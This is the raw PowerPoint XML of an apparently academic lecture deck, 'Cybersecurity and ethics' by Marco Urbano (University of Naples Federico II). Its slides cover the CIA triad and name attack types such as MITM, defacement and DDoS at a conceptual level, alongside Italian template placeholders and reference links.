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9"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId40"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="282" r:id="rId4"/>
    <p:sldId id="314" r:id="rId5"/>
    <p:sldId id="291"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25" r:id="rId19"/>
    <p:sldId id="310" r:id="rId20"/>
    <p:sldId id="311" r:id="rId21"/>
    <p:sldId id="312" r:id="rId22"/>
    <p:sldId id="326" r:id="rId23"/>
    <p:sldId id="313" r:id="rId24"/>
    <p:sldId id="327" r:id="rId25"/>
    <p:sldId id="315" r:id="rId26"/>
    <p:sldId id="316" r:id="rId27"/>
    <p:sldId id="317" r:id="rId28"/>
    <p:sldId id="318" r:id="rId29"/>
    <p:sldId id="328" r:id="rId30"/>
    <p:sldId id="319" r:id="rId31"/>
    <p:sldId id="330" r:id="rId32"/>
    <p:sldId id="320" r:id="rId33"/>
    <p:sldId id="331" r:id="rId34"/>
    <p:sldId id="332" r:id="rId35"/>
    <p:sldId id="329" r:id="rId36"/>
    <p:sldId id="323" r:id="rId37"/>
    <p:sldId id="296" r:id="rId3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11" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="92" d="100"/>
          <a:sy n="92" d="100"/>
        </p:scale>
        <p:origin x="1254"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5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4DDF42-EA81-4D58-9E48-71D338B26FAC}" type="datetime1">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>05/06/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>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‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"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BFCAD0-C8D4-46EE-8714-3DAE081602B2}" type="datetime1">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr/>
              <a:t>05/06/2022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smtClean="0"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"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8530193B-564F-4854-8A52-728F3FB19C85}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2588675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di questi attacchi può andare dal furto di proprietà intellettuale o dati di infrastrutture critiche.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Le tecniche utilizzate sono ad esempio lo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>sphear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> phishing, l’ingegneria sociale o gli attacchi drive-by download.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281829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24</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257296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Senso di colpa, avidità.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141453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8530193B-564F-4854-8A52-728F3FB19C85}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4230911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4500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testo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7867C73D-EE16-41D1-B7CE-A35C765E3B8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5129800" y="1511250"/>
            <a:ext cx="4500000" cy="468000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CD4FE60C-ACE5-4516-8CB6-EEDD96DB7358}"/>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6A38E24-EB1C-472F-B631-5DF32F9C4CF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572900" y="1511476"/>
            <a:ext cx="2916000" cy="467924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1" name="Segnaposto testo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B4A252E-78C9-4F76-98A4-A4B580AD072A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6713800" y="1511475"/>
            <a:ext cx="2916000" cy="4679250"/>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100">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F5B3657-F2AE-455A-BF81-1A0C2ACECD20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229045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3" name="Segnaposto testo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A983D98-E0AB-429A-9EC2-B50D4216D691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4148900" y="1512000"/>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5" name="Segnaposto testo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{755213BF-EF6D-45DC-A01B-DE6C2F23A6D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6007350" y="1507535"/>
            <a:ext cx="1764000" cy="4679250"/>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7" name="Segnaposto testo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D6BBBA-F4A3-45D4-91BC-A405FFDC7C3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865800" y="1507535"/>
            <a:ext cx="1764000" cy="4683715"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl5pPr>
              <a:defRPr sz="11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5" name="Sottotito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piè di pagina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it-IT" dirty="0"/>
              <a:t>Aggiungere un piè di pagina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto numero diapositiva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2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>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221811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3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Segnaposto immagine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it-IT" dirty="0"/>
              <a:t>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5" name="Segnaposto numero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to contenuto 1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Segnaposto immagine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nchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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contenuto 2">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it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Segnaposto immagine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6" name="Titolo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rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Sottotitolo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sinistro confronto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9322B50D-6A7D-41C6-BA57-613BC231DF36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="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2" name="Segnaposto sinistro confronto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A963F8-6F6E-440E-B3B3-DDE13C083A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>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it-IT"/>
              <a:t>Fare clic per modificare gli stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Segnaposto testo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF0A5256-B267-47DA-858A-0F3867CB6139}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5129800" y="2020359"/>
            <a:ext cx="4500000" cy="417089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it-IT" dirty="0"/>
              <a:t>Aggiungere un piè di pagina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero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dirty="0"/>
              <a:t>Immettere la didascalia</a:t>
            </a:r>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dirty="0"/>
              <a:t>Aggiungere un piè di pagina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Segnaposto numero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i ringraziame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it-IT" dirty="0"/>
              <a:t>Grazie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rettango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Segnaposto testo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it-IT" dirty="0"/>
              <a:t>Nome completo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Segnaposto testo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Numero di telefono</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Segnaposto testo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Indirizzo di posta elettronica o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>handle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> di social media</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Segnaposto testo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it-IT" dirty="0"/>
              <a:t>Sito Web della società</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it-IT" dirty="0"/>
              <a:t>Aggiungere un piè di pagina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto numero diapositiva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it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"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7" name="Rettangolo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Segnaposto tito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it-IT" dirty="0"/>
              <a:t>Fare clic per modificare il titolo della pagina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto tes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it-IT" dirty="0"/>
              <a:t>Aggiungere un piè di pagina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero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it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Casella di testo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it-IT" sz="1600" b="1" spc="-100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Corbel" panose="020B0503020204020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FIRST UP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1600" b="1" spc="-100" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Corbel" panose="020B0503020204020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" spc="-100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" panose="020B0503020204020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" spc="-100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Corbel" panose="020B0503020204020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CONSULTANTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rettangolo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Rettangolo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web.archive.org/web/20130730074644/http:/project.cyberpunk.ru/idb/hacker_ethics.html"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web.archive.org/web/20130730074644/http:/project.cyberpunk.ru/idb/hacker_ethics.html"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phrack.org/archives/issues/7/3.txt" TargetMode="Externa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39161649_The_Ethics_of_Cybersecurity"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blog.radware.com/security/attack-types-and-vectors/2019/12/nation-state-attacks-motivations-consequence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Advanced_persistent_threat" TargetMode="Externa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owasp.org/www-project-top-ten/"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wikileaks.org/hackingteam/emails/"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5.sv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hyperlink" Target="https://marcourbano.github.io/" TargetMode="External"/><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hyperlink" Target="https://www.linkedin.com/in/urbanomar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mic.com/articles/119602/in-one-quote-edward-snowden-summed-up-why-our-privacy-is-worth-fighting-for"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200B3D2B-613A-41BE-987D-E6A1324B456D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" sz="5400" dirty="0"/>
              <a:t>Cybersecurity and ethics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Segnaposto immagine 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2411CA0B-8E20-7C48-9074-8D57423981DC}"/>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37908" r="37908"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Sottotitolo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4772945D-CA91-4CFE-8EB7-941C7618C994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7291121" y="5057328"/>
            <a:ext cx="3401478" cy="1192038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Di Marco Urbano</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Università degli studi di Napoli Federico II</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="CasellaDiTesto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB64484-A89B-4A6E-8F7F-7E57100D7B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8991860" y="6236605"/>
            <a:ext cx="4187536" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>06/11/20</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D4589900-454A-4072-8704-10D53D00ED7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{283651DD-C117-4349-AD63-0D6655571A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>SOME OBSERVATIONS ABOUT SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C2B50CA-FDA8-4D57-858D-AD8EF0FB6D72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466080" y="1248132"/>
            <a:ext cx="9131100" cy="5201424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If I shutdown my server it is sure that confidentiality and integrity will be guaranteed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>but I will fail to ensure availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Confidentiality can be impaired, for example, by carrying out a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>MITM Attack (Man in The Middle)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> or by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>stealing a private key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(to read all the messages intended for the attacked user).</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Integrity can be impaired, for example, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>defacing a website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>or by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>altering the content of a database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Availability can be impaired (also) by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>DoS (Denial of Service) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>DDoS (Distributed DoS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>attacks that make impossible to reach or to use the attacked resource.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35767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947985E-244E-4A00-8822-099F7B0F9905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4550C345-EFBF-4ADA-8837-74BF04C228B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>SOME OBSERVATIONS ABOUT SECURITY (PT. 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9320D83A-C6FA-4CB7-B5B4-CFC35A8D8801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1628775"/>
            <a:ext cx="893445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It is possible to fail to guarantee one or all the CIA triad properties even without the presence of malicious actors.</a:t>
            </a:r>
